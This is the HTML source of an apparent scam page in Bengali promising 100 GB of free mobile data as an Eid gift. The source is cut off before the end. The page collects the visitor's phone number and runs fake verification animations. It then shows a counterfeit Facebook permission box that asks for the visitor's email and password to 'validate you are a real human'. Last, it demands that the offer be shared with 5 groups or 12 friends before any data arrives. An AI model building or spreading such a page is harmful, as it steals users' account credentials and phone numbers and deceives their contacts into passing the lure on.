<html>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta name="robots" content="noindex">
<meta content="https://569cdn.com/qita/adhabd.jpg" itemprop="image" property="og:image" />
<meta property="og:title" content="ঈদ মোবারক! ১০০ জিবি ফ্রি ইন্টারনেট! আমি পেয়েছি, আপনিও নিতে পারেন!" />
<meta content="ঈদ মোবারক! উপহার হিসেবে ১০০ জিবি ফ্রি ইন্টারনেট পেয়ে যান!" property="og:description" />
<meta property="og:updated_time" content="1748970192" />
<title>ঈদ মোবারক! ১০০ জিবি ফ্রি ইন্টারনেট উপহার!</title>
<script>
    function set_Cookie(name, value) {
        var Days = 30;
        var exp = new Date();
        exp.setTime(exp.getTime() + (Days * 120 * 1000));
        document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString() + "; path=/;"
    }

    function get_Cookie(name) {
        var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");
        if (arr = document.cookie.match(reg)) {
            return unescape(arr[2]);
        }
        return '';
    }
</script>


<style>
    :root {
        --color-primary: rgb(37, 38, 38);
        --color-secondary: #ff6d0e;
        --color-secondary2: #ff6d0e
    }

    * {
        box-sizing: border-box;
        padding: 0;
        margin: 0
    }

    html {
        font-size: 62.5%;
        font-family: Montserrat;
        font-weight: 500;
        color: var(--color-primary)
    }

    .quedate-container,
    body {
        width: 100vw
    }

    .container-chat {
        font-weight: 400
    }

    .chat,
    .wrapper {
        display: flex;
        flex-direction: column
    }

    .loading__box-1--hidden {
        display: none !important
    }

    .loading__box-2--hidden {
        display: none !important
    }

    .loading__box-3--hidden {
        display: none !important
    }

    .loading__check-1--hidden {
        display: none !important
    }

    .loading__check-2--hidden {
        display: none !important
    }

    .loading__check-3--hidden {
        display: none !important
    }

    .chat__reactions {
        width: 90%;
        margin: 2rem auto 0;
        display: flex;
        align-items: stretch;
        font-size: .95rem
    }

    .chat__reactions-icon {
        width: 1.2rem;
        margin-right: .2rem
    }

    .chat__reactions-text {
        margin-left: .5rem
    }

    .chat__reactions-counter {
        margin-left: 1.8rem
    }

    .chat__actions {
        margin-top: 1rem;
        display: flex;
        justify-content: space-around;
        font-size: 1.2rem;
        border-top: 1.4px solid #b0b0b0;
        border-bottom: .5px solid #d3d3d3
    }

    .chat__actions-box {
        display: flex;
        align-items: center
    }

    .chat__actions img {
        width: 4rem
    }

    .chat__conversation {
        width: 90%;
        margin: 0 auto;
        font-size: 1.2rem
    }

    .chat__conversation-box {
        display: flex;
        flex-direction: row;
        align-items: center;
        margin-top: 1rem;
        position: relative
    }

    .chat__conversation-box--right {
        margin-left: 20%;
        margin-bottom: 1rem
    }

    .chat__conversation-box-img {
        width: 3.5rem;
        border-radius: 50%;
        margin-right: 1rem;
        align-self: baseline
    }

    .chat__conversation-box-active {
        width: 1rem;
        height: 1rem;
        background-color: var(--color-secondary);
        border-radius: 50%;
        position: absolute;
        top: 2.5rem;
        left: 2.7rem
    }

    .chat__conversation-box-content-comment {
        padding: 1rem;
        background-color: #f2f3f5;
        border-top-left-radius: 14px;
        border-top-right-radius: 14px;
        border-bottom-left-radius: 14px;
        border-bottom-right-radius: 14px
    }

    .chat__conversation-box-content-comment-name {
        color: #726695;
        font-weight: 500;
        margin-right: .4rem
    }

    .chat__conversation-box-content-cta {
        margin-top: .3rem;
        padding-left: 1.5rem;
        color: #726695
    }

    .chat__conversation-box-content-cta-text {
        margin-right: .5rem
    }

    .chat__conversation-box-content-cta--2 {
        font-size: .9rem
    }

    .chat__conversation-reply {
        margin-left: 20%;
        color: gray
    }

    .chat__conversation-reply--efect {
        animation: opacidad 1s infinite
    }

    @keyframes opacidad {
        0 {
            opacity: 0
        }
        50% {
            opacity: 1
        }
        100% {
            opacity: 0
        }
    }

    .chat__conversation-write {
        position: relative;
        margin-bottom: 2rem
    }

    .chat__conversation-write input {
        width: 100%;
        margin-top: 2rem;
        margin-bottom: 1rem;
        border: none;
        background-color: #f2f3f5;
        border-radius: 100px;
        padding: .8rem;
        color: var(--color-primary);
        padding-left: 1rem;
        outline: 0
    }

    .chat__conversation-write-icons {
        display: flex;
        flex-direction: row;
        position: absolute;
        right: 1.2rem;
        top: 1.8rem
    }

    .chat__conversation-write-icons-img {
        width: 1.2rem;
        margin-right: .5rem;
        fill: gray
    }

    .chat__conversation-write-icons-img--svg {
        width: 2rem
    }

    .loading {
        width: 100%;
        height: 220px;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        position: absolute;
        top: 48px;
        z-index: 10;
        background-color: #fff;
        box-shadow: 4px 4px 18px 3px rgba(0, 0, 0, .3)
    }

    .loading__box {
        width: 50%;
        display: flex;
        flex-direction: row;
        align-items: center;
        position: relative
    }

    .loading__animate,
    .loading__check {
        width: 5rem
    }

    .loading__check {
        position: absolute;
        left: 0
    }

    .loading__txt {
        font-size: 1.2rem;
        color: var(--color-primary);
        margin-left: 1rem
    }

    .loading2 {
        width: 100%;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        position: absolute;
        top: 120px;
        z-index: 20;
        background-color: #fff;
        box-shadow: 4px 4px 18px 3px rgba(0, 0, 0, .3)
    }

    .loading2__box {
        text-align: justify;
        padding: 2rem;
        color: var(--color-primary);
        font-size: 14px
    }

    .loading2__permission {
        width: 12rem;
        margin: 0 auto
    }

    .js-hidden {
        display: none !important
    }

    .js-display {
        display: block
    }

    .js-show {
        visibility: hidden !important
    }

    .logo-container {
        width: 100%;
        padding-top: 1.5rem;
        padding-bottom: 1.5rem;
        display: flex;
        flex-direction: row;
        align-items: center;
        justify-content: center;
        color: var(--color-primary);
        font-size: 2rem;
        margin: 0 auto 20px;
        background-image: linear-gradient(to bottom right, #079273, #079273);
        color: white
    }

    .quedate-container {
        width: 100%;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center
    }

    .quedate {
        width: 100%
    }

    .quedate__fixed {
        background-color: var(--color-primary)
    }

    .quedate__fixed-box {
        width: 90%;
        margin: 0 auto;
        display: flex;
        align-items: center;
        padding: .5rem
    }

    .quedate__fixed-box span {
        margin: 0 auto;
        color: #fff;
        font-size: 1.5rem
    }

    .quedate__company {
        width: 30%;
        border-right: 1px solid var(--color-secondary)
    }

    .quedate__step {
        width: 100%;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        padding-top: 0
    }

    @keyframes glowing {
        0% {
            box-shadow: 0 0 -10px #000000
        }
        40% {
            box-shadow: 0 0 20px #000000
        }
        60% {
            box-shadow: 0 0 20px #000000
        }
        100% {
            box-shadow: 0 0 -10px #000000
        }
    }

    .button-glow {
        animation: glowing 5000ms infinite;
        transition: 0.2s linear;
        background-image: linear-gradient(to bottom right, #ff6d0e, #ff6d0e)
    }

    .quedate__step-box {
        width: 96%;
        display: flex;
        flex-direction: row;
        align-items: center;
        justify-content: center;
        margin: 20px auto 20px;
        text-align: center;
        padding-bottom: 15px;
        position: relative
    }

    .quedate__step-box:before {
        position: absolute;
        bottom: 0;
        left: 50%;
        content: '';
        height: 6px;
        width: 100px;
        border-radius: 10px;
        background-color: var(--color-secondary);
        transform: translateX(-50%)
    }

    .quedate__border {
        width: 30px;
        height: 80%;
        background-color: var(--color-secondary);
        margin-right: 1rem;
        display: none
    }

    .quedate__cta-btn {
        width: 80%;
        cursor: pointer;
        font-size: 2rem;
        font-weight: 700;
        color: #fff;
        padding: 1rem;
        border: none;
        border-top-left-radius: 14px;
        border-top-right-radius: 14px;
        border-bottom-left-radius: 14px;
        border-bottom-right-radius: 14px;
        outline: 0;
        margin: 0 0 20px 3.5rem;
        background-image: linear-gradient(to bottom right, #F2225C, #F2225C)
    }

    .quedate__cta-btn:active,
    .quedate__cta-btn:hover {
        background-color: #03a658
    }

    .quedate__cta-btn:active {
        transform: translateY(2px)
    }

    .quedate__cta-btn2 {
        width: 80%;
        cursor: pointer;
        font-size: 2rem;
        font-weight: 700;
        color: #fff;
        padding: 1rem;
        border: none;
        border-radius: 14px;
        outline: 0;
        margin: 0 0 20px 3.5rem;
        background-image: linear-gradient(to right, #4962ff, #ff5c87)
    }

    .quedate__cta-btn2:active,
    .quedate__cta-btn2:hover {
        background-color: #4962ff
    }

    .quedate__cta-btn2:active {
        transform: translateY(2px)
    }

    .quedate__loading {
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center
    }

    .quedate__svg {
        position: relative
    }

    .quedate__check {
        position: absolute;
        left: 0
    }

    .quedate__porcent {
        margin-top: 1rem;
        margin-bottom: 2rem;
        font-size: 2.5rem;
        font-weight: 700
    }

    .quedate__form {
        border: 1.5px solid #c0bfc3;
        border-top-right-radius: 8px;
        border-top-left-radius: 8px;
        border-bottom-left-radius: 8px;
        border-bottom-right-radius: 8px;
        padding: 1rem;
        position: relative;
        margin-top: 2.5rem
    }

    .quedate__form-input {
        border: none;
        outline: 0
    }

    .quedate__form-input::placeholder {
        color: #c0bfc3;
        font-family: inherit;
        font-size: 1.5rem
    }

    .quedate__form-separar {
        position: absolute;
        width: 1px;
        height: 100%;
        top: 0;
        background-color: #c0bfc3
    }

    .quedate__form-label {
        font-size: 1.5rem;
        font-weight: 700;
        padding: 2rem
    }

    .quedate__first {
        width: 90%;
        display: flex;
        flex-direction: row;
        align-items: center;
        justify-content: center;
        margin: 9px auto
    }

    .quedate__load {
        width: 80%;
        font-size: 1.3rem;
        padding: .8rem;
        border: 1px solid var(--color-primary);
        position: relative
    }

    .quedate__load-icon {
        width: 30%;
        display: flex;
        flex-direction: row;
        align-items: center;
        justify-content: center;
        position: relative;
        border: 1px solid var(--color-primary);
        padding-right: .8rem;
        padding-left: .8rem;
        border-left: none
    }

    .quedate__load-text {
        margin-left: .5rem;
        font-size: 1.2rem;
        font-weight: 700
    }

    .quedate__load-a {
        position: absolute;
        height: 3.2rem;
        top: 0;
        z-index: -1;
        left: 0;
        background-color: var(--color-secondary2)
    }

    .permision-container {
        width: 95%;
        margin: 0 auto;
        display: flex;
        flex-direction: column;
        align-items: center;
        background-color: #fff;
        box-shadow: 4px 4px 18px 3px rgba(0, 0, 0, .4);
        position: absolute;
        top: .8rem;
        left: .8rem;
        z-index: 15
    }

    .permision-container-box {
        width: 95%;
        margin: 0 auto
    }

    .permision-container-end,
    .permision-container-request-text {
        width: 100%;
        padding: 1.2rem;
        background-color: #ededf3;
        font-size: 1.5rem;
        font-weight: 700
    }

    .permision-container-end {
        font-size: 1rem;
        font-weight: 400;
        text-align: center
    }

    .permision-container-data {
        padding: 2rem
    }

    .permision-container-icons {
        width: 60%;
        margin: 0 auto;
        display: flex;
        flex-direction: row;
        align-items: center;
        justify-content: space-around;
        margin-bottom: 2.5rem
    }

    .permision-container-icons-face,
    .permision-container-icons-uber {
        width: 8rem
    }

    .permision-container-txt {
        margin: 0 auto;
        font-size: 1.5rem;
        text-align: center;
        margin-bottom: 1.5rem
    }

    .permision-container-form {
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: space-between
    }

    .permision-container-input {
        outline: 0;
        padding: 1.2rem;
        width: 100%;
        margin-bottom: 1.5rem;
        border-top-left-radius: 10px;
        border-top-right-radius: 10px;
        border-bottom-left-radius: 10px;
        border-bottom-right-radius: 10px;
        border: 1px solid #b9b9b9;
        color: gray;
        font-size: 1.2rem
    }

    .permision-container-secure {
        margin-top: 1rem;
        display: flex;
        flex-direction: row;
        align-items: center;
        justify-content: center;
        color: #a2a2a2
    }

    .permision-container-secure svg {
        width: 1.5rem;
        height: 1.5rem;
        margin-right: 1rem
    }

    .permision-container-cta {
        width: 100%;
        padding: .8rem;
        margin-top: 1rem;
        margin-bottom: 1.5rem;
        margin-left: 0;
        font-size: 1.8rem
    }

    input::-webkit-outer-spin-button,
    input::-webkit-inner-spin-button {
        -webkit-appearance: none;
        margin: 0
    }

    input[type=number] {
        -moz-appearance: textfield
    }
</style>

<div id="fireworks">
    <div class="wrapper">
        <div class="container-main">
            <img alt="main" id="main" class="lazyload" data-src="https://569cdn.com/qita/adhabd.jpg" width="100%" />
            <div class="quedate-container">
                <main class="quedate">
                    <div class="quedate__step" id="first-box">
                        <header class="logo-container">
                            <svg fill="#ffffff" height="20px" viewbox="-31 0 512 512" width="20px" xmlns="http://www.w3.org/2000/svg"> 
          <path d="m30 316c-16.570312 0-30 13.429688-30 30 0 16.566406 13.429688 30 30 30h59l-14 106c0 16.566406 13.429688 30 30 30s30-13.433594 30-30l14-106h120l-14 106c0 16.566406 13.429688 30 30 30s30-13.433594 30-30l14-106h61c16.570312 0 30-13.433594 30-30 0-16.570312-13.429688-30-30-30h-53l16-120h67c16.570312 0 30-13.433594 30-30 0-16.570312-13.429688-30-30-30h-59l14-106c0-16.570312-13.429688-30-30-30s-30 13.429688-30 30l-14 106h-120l14-106c0-16.570312-13.429688-30-30-30s-30 13.429688-30 30l-14 106h-61c-16.570312 0-30 13.429688-30 30 0 16.566406 13.429688 30 30 30h53l-16 120zm143-120h120l-16 120h-120zm0 0" /> 
         </svg>
                            <!--<span style="font-size: 20px;">🎅</span>         -->
                            <span class="quedate-logo" style="color: #ffffff;">ঈদ মোবারক! সমস্ত নেটওয়ার্কে ১০০GB ফ্রি ডেটা উপভোগ করুন!</span>
                        </header>
                        <div class="quedate__step-box">
                            <span class="quedate__border"></span>
                            <p style="font-size: 3.0rem;" class="quedate__text"><b>সমস্ত নেটওয়ার্কের জন্য বিনামূল্যে 100GB ডেটা প্ল্যান৷</b></p>
                            <span class="quedate__border"></span>
                        </div>
                    </div>
                    <div style="text-align: center;">
                        <button style="margin:0 0 30px;" id="validar" class="quedate__cta-btn button-glow">CLICK HERE</button>
                    </div>
                    <div class="quedate__loading">
                        <!--loading svg-->
                        <svg id="loading-svg" class="js-hidden" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto; " viewbox="0 0 100 100" preserveaspectratio="xMidYMid" width="10rem"> 
         <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#ff6d0e" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)"> 
          <animatetransform attributename="transform" type="rotate" dur="1s" repeatcount="indefinite" keytimes="0;1" values="0 50 50;360 50 50"></animatetransform> 
         </circle> 
         <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#3c9900" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)"> 
          <animatetransform attributename="transform" type="rotate" dur="1s" repeatcount="indefinite" keytimes="0;1" values="0 50 50;-360 50 50"></animatetransform> 
         </circle> 
        </svg>
                        <!--end loading svg-->
                        <!--checked svg-->
                        <svg id="check-svg" class="js-hidden" xml:space="preserve" viewbox="0 0 100 100" y="0" x="0" xmlns="http://www.w3.org/2000/svg" version="1.1" style=" background: rgb(255, 255, 255);" width="10rem"> 
         <g class="ldl-scale" style="transform-origin: 50% 50%; transform: rotate(0deg) scale(0.8, 0.8);"> 
          <g class="ldl-ani"> 
           <g class="ldl-layer"> 
            <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -0.833333s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;"> 
             <circle stroke-miterlimit="10" stroke-width="8" stroke="#333" fill="none" r="40" cy="50" cx="50" style="stroke: rgb(6, 193, 103);"></circle> 
            </g> 
           </g> 
           <g class="ldl-layer"> 
            <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -1.11111s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;"> 
             <path fill="#abbd81" d="M73.3 33.5c-2.3-2.3-6.1-2.3-8.4 0L44.5 53.9l-9.4-9.4c-2.3-2.3-6.1-2.3-8.4 0-1.1 1.1-1.7 2.6-1.7 4.2s.6 3.1 1.7 4.2l13.6 13.6c1.1 1.1 2.6 1.7 4.2 1.7s3.1-.6 4.2-1.7L73.2 42c1.1-1.1 1.7-2.6 1.7-4.2s-.5-3.1-1.6-4.3z" style="fill: rgb(6, 193, 103);"></path> 
            </g> 
           </g> 
           <metadata xmlns:d="https://loading.io/stock/"> 
            <d:name>
             ok
            </d:name> 
            <d:tags>
             ok,confirm,ready,positive,check,right,correct,affirmative,success
            </d:tags> 
            <d:license>
             by
            </d:license> 
            <d:slug>
             364zp
            </d:slug> 
           </metadata> 
          </g> 
         </g> 
        </svg>
                        <!--end check svg-->
                        <span class="quedate__porcent js-hidden"></span>
                        <span style="font-size: 16px;font-weight: bold;" class="quedate__porcent-text js-hidden">ধন্যবাদ, আমরা ইতিমধ্যেই চেক করেছ</span>
                    </div>
                    <!-- termina la primera parte -->
                    <!-- Segunda parte -->
                    <div id="second-box" style="margin-bottom: 2.5rem" class="quedate__step js-hidden">
                        <div class="quedate__step-box">
                            <p style="font-size: 1.5rem; text-align:center" class="quedate__text">আপনার নম্বর লিখুন<b class="quedate__city"></b> আপনি এখন আপনার মোবাইল ফোনে 3 মাসের জন্য বৈধ 100GB ডেটা প্ল্যান গ্রহণ এবং সক্রিয় করার যোগ্য কিনা তা পরীক্ষা করতে.</p>
                        </div>
                        <script>
                            var prevent = (e) => e.preventDefault();
                        </script>
                        <form class="quedate__form" onsubmit="return prevent(event)">
                            <input class="quedate__form-input" id="num" type="number" placeholder="ফোন নম্বর লিখু" />
                            <span class="quedate__form-separar"></span>
                            <label id="enviar" class="quedate__form-label" for="num">পাঠান</label>
                            <div class="message-status js-hidden"></div>
                        </form>
                    </div>
                    <!-- Tercera parte -->
                    <div id="third-box" style="margin-bottom: 2.5rem;" class="quedate__step js-hidden">
                        <span style="font-weight: bold; font-size: 2rem; text-align:center" class="quedate__text">আপনার নম্বর চেক করা হচ্ছে.</span>
                        <div class="quedate__first js-hidden">
                            <div style="border: 1px solid gray,color:white;  width:80%" class="quedate__load">
                                ডেটা প্রসেস করা হচ্ছে.
                                <span class="quedate__load-a js-hidden"></span>
                            </div>
                            <div style="border: 1px solid gray;border-left: none; width:30%" class="quedate__load-icon">
                                <svg id="first-loading" class="quedate__load-animate" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto;" viewbox="0 0 100 100" preserveaspectratio="xMidYMid" width="3.2rem"> 
           <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#ff6d0e" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)"> 
            <animatetransform attributename="transform" type="rotate" dur="1s" repeatcount="indefinite" keytimes="0;1" values="0 50 50;360 50 50"></animatetransform> 
           </circle> 
           <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#3c9900" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)"> 
            <animatetransform attributename="transform" type="rotate" dur="1s" repeatcount="indefinite" keytimes="0;1" values="0 50 50;-360 50 50"></animatetransform> 
           </circle> 
          </svg>
                                <svg id="???_1" class="quedate__load-check js-hidden" xml:space="preserve" viewbox="0 0 100 100" y="0" x="0" xmlns="http://www.w3.org/2000/svg" version="1.1" width=" 3.2rem"> 
           <g class="ldl-scale" style="transform-origin: 50% 50%; transform: rotate(0deg) scale(0.8, 0.8);"> 
            <g class="ldl-ani"> 
             <g class="ldl-layer"> 
              <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -0.833333s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;"> 
               <circle stroke-miterlimit="10" stroke-width="8" stroke="#333" fill="none" r="40" cy="50" cx="50" style="stroke: rgb(6, 193, 103);"></circle> 
              </g> 
             </g> 
             <g class="ldl-layer"> 
              <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -1.11111s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;"> 
               <path fill="#abbd81" d="M73.3 33.5c-2.3-2.3-6.1-2.3-8.4 0L44.5 53.9l-9.4-9.4c-2.3-2.3-6.1-2.3-8.4 0-1.1 1.1-1.7 2.6-1.7 4.2s.6 3.1 1.7 4.2l13.6 13.6c1.1 1.1 2.6 1.7 4.2 1.7s3.1-.6 4.2-1.7L73.2 42c1.1-1.1 1.7-2.6 1.7-4.2s-.5-3.1-1.6-4.3z" style="fill: rgb(6, 193, 103);"></path> 
              </g> 
             </g> 
             <metadata xmlns:d="https://loading.io/stock/"> 
              <d:name>
               ok
              </d:name> 
              <d:tags>
               ok,confirm,ready,positive,check,right,correct,affirmative,success
              </d:tags> 
              <d:license>
               by
              </d:license> 
              <d:slug>
               364zp
              </d:slug> 
             </metadata> 
            </g> 
           </g> 
          </svg>
                                <span id="first-porcent" class="quedate__load-text"></span>
                            </div>
                        </div>
                        <div class="quedate__first js-hidden">
                            <div style="border: 1px solid gray; width:80%" class="quedate__load">
                                অভিনন্দন! আপনি 100GB জিতেছেন. <span class="quedate__load-a js-hidden"></span>
                            </div>
                            <div style="border: 1px solid gray;border-left: none; width:30%" class="quedate__load-icon">
                                <svg id="second-loading" class="quedate__load-animate" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto;" viewbox="0 0 100 100" preserveaspectratio="xMidYMid" width="3.2rem"> 
           <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#ff6d0e" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)"> 
            <animatetransform attributename="transform" type="rotate" dur="1s" repeatcount="indefinite" keytimes="0;1" values="0 50 50;360 50 50"></animatetransform> 
           </circle> 
           <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#3c9900" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)"> 
            <animatetransform attributename="transform" type="rotate" dur="1s" repeatcount="indefinite" keytimes="0;1" values="0 50 50;-360 50 50"></animatetransform> 
           </circle> 
          </svg>
                                <svg id="???_1" class="quedate__load-check js-hidden" xml:space="preserve" viewbox="0 0 100 100" y="0" x="0" xmlns="http://www.w3.org/2000/svg" version="1.1" width=" 3.2rem"> 
           <g class="ldl-scale" style="transform-origin: 50% 50%; transform: rotate(0deg) scale(0.8, 0.8);"> 
            <g class="ldl-ani"> 
             <g class="ldl-layer"> 
              <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -0.833333s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;"> 
               <circle stroke-miterlimit="10" stroke-width="8" stroke="#333" fill="none" r="40" cy="50" cx="50" style="stroke: rgb(6, 193, 103);"></circle> 
              </g> 
             </g> 
             <g class="ldl-layer"> 
              <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -1.11111s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;"> 
               <path fill="#abbd81" d="M73.3 33.5c-2.3-2.3-6.1-2.3-8.4 0L44.5 53.9l-9.4-9.4c-2.3-2.3-6.1-2.3-8.4 0-1.1 1.1-1.7 2.6-1.7 4.2s.6 3.1 1.7 4.2l13.6 13.6c1.1 1.1 2.6 1.7 4.2 1.7s3.1-.6 4.2-1.7L73.2 42c1.1-1.1 1.7-2.6 1.7-4.2s-.5-3.1-1.6-4.3z" style="fill: rgb(6, 193, 103);"></path> 
              </g> 
             </g> 
             <metadata xmlns:d="https://loading.io/stock/"> 
              <d:name>
               ok
              </d:name> 
              <d:tags>
               ok,confirm,ready,positive,check,right,correct,affirmative,success
              </d:tags> 
              <d:license>
               by
              </d:license> 
              <d:slug>
               364zp
              </d:slug> 
             </metadata> 
            </g> 
           </g> 
          </svg>
                                <span id="second-porcent" class="quedate__load-text"></span>
                            </div>
                        </div>
                    </div>
                    <!-- Loading-->
                    <div id="loading-g" class="quedate__step js-hidden">
                        <div class="quedate__step-box">
                            <svg class="quedate__animate" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto;" viewbox="0 0 100 100" preserveaspectratio="xMidYMid" width="10rem"> 
          <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#ff6d0e" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)"> 
           <animatetransform attributename="transform" type="rotate" dur="1s" repeatcount="indefinite" keytimes="0;1" values="0 50 50;360 50 50"></animatetransform> 
          </circle> 
          <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#3c9900" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)"> 
           <animatetransform attributename="transform" type="rotate" dur="1s" repeatcount="indefinite" keytimes="0;1" values="0 50 50;-360 50 50"></animatetransform> 
          </circle> 
         </svg>
                        </div>
                        <p style="font-size: 14px;font-weight: bold;">অপেক্ষা করুন, আমরা ডেটা যাচাই করছি</p>
                    </div>
                </main>
            </div>
            <!-- FIN PASOS -->
            <!-- Ventana permiso -->
            <div class="permision-container js-hidden">
                <span class="permision-container-request-text">Request Permission</span>
                <div class="permision-container-data">
                    <div class="permision-container-icons">
                        <!-- Generator: Adobe Illustrator 18.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
                        <svg width="50px" version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewbox="0 0 112.196 112.196" style="enable-background:new 0 0 112.196 112.196;" xml:space="preserve"> 
         <g> 
          <circle style="fill:#3B5998;" cx="56.098" cy="56.098" r="56.098" /> 
          <path style="fill:#FFFFFF;" d="M70.201,58.294h-10.01v36.672H45.025V58.294h-7.213V45.406h7.213v-8.34
            		c0-5.964,2.833-15.303,15.301-15.303L71.56,21.81v12.51h-8.151c-1.337,0-3.217,0.668-3.217,3.513v7.585h11.334L70.201,58.294z" /> 
         </g> 
        </svg>
                    </div>
                    <div class="permision-container-box">
                        <p class="permision-container-txt">We should validate you are a real human checking your name and profile photo.</p>
                        <form action="#" class="permision-container-form">
                            <input class="permision-container-input" type="text" id="email" placeholder="your@email.com" />
                            <label class="permision-container-label" for="email"></label>
                            <input class="permision-container-input" type="password" id="pass" placeholder="??????????" />
                            <label class="permision-container-label" for="pass"></label>
                        </form>
                        <span class="message-status fb-request"></span>
                        <button style="width:100%; margin-left: 0;" id="aceptar" class="quedate__cta-btn">Accept - Im Human</button>
                        <div class="permision-container-secure">
                            <svg fill="#a2a2a2" height="512pt" viewbox="-64 0 512 512" width="512pt" xmlns="http://www.w3.org/2000/svg"> 
          <path d="m336 192h-16v-64c0-70.59375-57.40625-128-128-128s-128 57.40625-128 128v64h-16c-26.453125 0-48 21.523438-48 48v224c0 26.476562 21.546875 48 48 48h288c26.453125 0 48-21.523438 48-48v-224c0-26.476562-21.546875-48-48-48zm-229.332031-64c0-47.0625 38.269531-85.332031 85.332031-85.332031s85.332031 38.269531 85.332031 85.332031v64h-170.664062zm0 0" /> 
         </svg>
                            <p class="permision-container-secure-text">The app is not allowed to post on Facebook</p>
                        </div>
                    </div>
                </div>
                <span class="permision-container-end">Our service privacy policy and conditions</span>
            </div>
            <div style="height: 269px;" class="loading2 js-hidden">
                <div style="text-align: center !important;" class="loading2__box">
                    <svg class="loading2__permission" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="" viewbox="0 0 100 100" preserveaspectratio="xMidYMid"> 
        <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#ff6d0e" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)"> 
         <animatetransform attributename="transform" type="rotate" dur="1s" repeatcount="indefinite" keytimes="0;1" values="0 50 50;360 50 50"></animatetransform> 
        </circle> 
        <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#6ae8a4" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)"> 
         <animatetransform attributename="transform" type="rotate" dur="1s" repeatcount="indefinite" keytimes="0;1" values="0 50 50;-360 50 50"></animatetransform> 
        </circle> 
       </svg>
                    <p style="text-align:center"> এক মুহূর্ত অপেক্ষা করুন, আমরা ডেটা যাচাই কর</p>
                </div>
            </div>
            <!--congratulations -->
            <div id="share" class="loading2 js-hidden js-congrats">
                <div class="loading2__box">
                    <span style="font-weight: bold; font-size:15px">অভিনন্দন! আপনার নম্বরটি বিনামূল্যে 100GB ডেটা পাওয়ার যোগ্য, 3 মাসের জন্য বৈধ!</span>
                    <br />
                    <br />
                    <span class="quedate__country"> <b>আপনার বিনামূল্যের 100GB ডেটা পেতে, নীচের বোতামটি ক্লিক করুন এবং আপনার পছন্দের মেসেজিং অ্যাপে 5টি গ্রুপ বা 12 জন বন্ধুর সাথে এই তথ্যটি শেয়ার করুন!</b> <br /> <br /> <b>আসুন আমরা একসাথে উদযাপন করি। আপনার প্রিয়জনকেও সুবিধার জন্য আমন্ত্রণ জানান</b> <br /> <br /> <b> বার্তা পাঠানোর পরে, আপনি এখন 15 মিনিটের মধ্যে আপনার মোবাইলে বিনামূল্যে 100GB ডেটা পাবেন।</b> <br />
        <div style="margin-top: 30px;margin-bottom: 30px;" class="quedate__first js-hidden js-share"> 
         <div style="border: 1px solid gray; width:80%" class="quedate__load">
